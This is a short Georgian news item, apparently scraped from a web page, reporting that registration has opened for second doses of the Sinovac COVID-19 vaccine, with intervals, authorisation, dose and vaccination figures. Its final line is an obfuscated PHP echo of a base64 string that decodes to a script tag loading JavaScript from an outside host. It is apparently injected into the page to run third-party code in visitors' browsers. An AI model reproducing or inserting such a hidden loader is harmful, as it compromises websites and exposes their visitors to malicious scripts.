celsiusi
ავერსი შნაიდერი
„სინოვაკის“ ვაქცინის მეორე დოზის მისაღებად მოქალაქეთა რეგისტრაცია დაიწყო.
 
ჯანდაცვის სამინისტროს ინფორმაციით, ვაქცინაციისთვის საჭირო ორი დოზა 14-28 დღის ინტერვალით კეთდება.
 
უწყების ცნობითვე, ჩინური წარმოების „სინოვაკის“ ვაქცინა სინოფარმის მსგავსად, ტრადიციულ მეთოდზე, ანუ ინაქტივრებული ვირუსის მეთოდოლოგიაზე დამყარებული ვაქცინაა, რომელიც 18 წლის ზემოთ ასაკის პირებისთვის გამოიყენება.
 
„სინოვაკის“ ვაქცინამ ჯანმრთელობის მსოფლიო ორგანიზაციის ავტორიზაცია პირველ ივნისს მიიღო.
 
დაავადებათა კონტროლის ეროვნული ცენტრის ინფორმაციით, საქართველოში „სინოვაკის“ 100 000 დოზა ვაქცინა შემოვიდა 29 აპრილს, პირველი დოზით აცრები დაიწყო 24 მაისს და დღემდე აცრილია 17 199 მოქალაქე.
 
ვაქცინაციისთვის ვიზიტის დაჯავშნა შესაძლებელია სპეციალურ პორტალზე ან ნომერზე – 1522.
1114
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");